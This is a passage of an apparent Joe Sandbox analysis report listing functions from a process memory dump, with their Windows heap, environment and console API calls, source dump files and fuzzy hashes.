                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB701
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB715
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocSize
                                                      • String ID:
                                                      • API String ID: 2549470565-0
                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction ID: 571ec14e998341a004c35bb6ac4a439367390e3f58948ef0e1355a89bf5dbd93
                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction Fuzzy Hash: 46213062A09786A6EF15EB11E441678F6A1FB89B80BDC9432DA0F03754DFBCE941C721
                                                      Function 00007FF7E1DD5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56C5
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD56D9
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56FD
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD5711
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction ID: cc9ee712fcb45e9e591c36c146fc6c95fb86678877c0b0cef4b1eb6d2d983d9a
                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction Fuzzy Hash: 50112572A04B81D6EB04AF56E4041A8BBB0FB89F85B988136DB4E03718DF38E456C750
                                                      Function 00007FF7E1DC4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DCEE64
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DCEE78
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                      • String ID:
                                                      • API String ID: 2759988882-0
                                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction ID: 567964930ba76a32a938d1862c05fe4f1771baacec405612afa27c4989fefbf7
                                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction Fuzzy Hash: B4F04F60F05B42D6EF09FB659406278EDD1FF8EB42B88C475CD0E82350EE7CA4048722
                                                      Function 00007FF7E1DDF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 1606018815-0
                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction ID: 30f8c1e0b5b06d5ad0a2cf184225881abd714b78e80bb3611b4bd5cb7713cf61
                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction Fuzzy Hash: D8F01C36A24A42DBD708AB11E445279FA60FB8AB03F84A275DA0B42394DF7CD0098B11
                                                      Function 00007FF7E1DBCAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitle
                                                      • String ID: -
                                                      • API String ID: 3358957663-3695764949
                                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                      • Instruction ID: 0cd3a84456ac453b714a8d37487b883b83d13ff4d6a8d57bb64b35d5efe4401e
                                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                      • Instruction Fuzzy Hash: 7B31BE21A0874296EB04FB11A802778EAA4FF49B90FD84536CE1E077D5DFBCE451C766
                                                      Function 00007FF7E1DC7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmpswscanf
                                                      • String ID: :EOF
                                                      • API String ID: 1534968528-551370653
                                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                      • Instruction ID: 2d01179304bbf9fa4548cb77de255d9e64bba176bb420da9d8aa8353f27c9f5a
                                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                      • Instruction Fuzzy Hash: E8319431E0864286FB14FB15A4423B8F6A0EF48B60FC48933DA5D46295DFBCE851C7A2
                                                      Function 00007FF7E1DBB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3$3
                                                      • API String ID: 0-2538865259
                                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                      • Instruction ID: 15e4e2377db0bf05f138cde5718331c6110736e0716ade626e9b2591930cdf23
                                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                      • Instruction Fuzzy Hash: 69018BB0D0A582AAF708FB20A882774F620BF49315FD40537C40F055A5CFBC69A4C663
                                                      Function 00007FF7E1DC06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                      • Instruction ID: 8e685b6937952020c12e089b69927045cdd6f5b4d7e893a82159c8c06c237c6e
                                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                      • Instruction Fuzzy Hash: 43416D75A0964686EB18EB10E44227EF7A0FF49B40FD48436C64D03794DFBCA550CBA1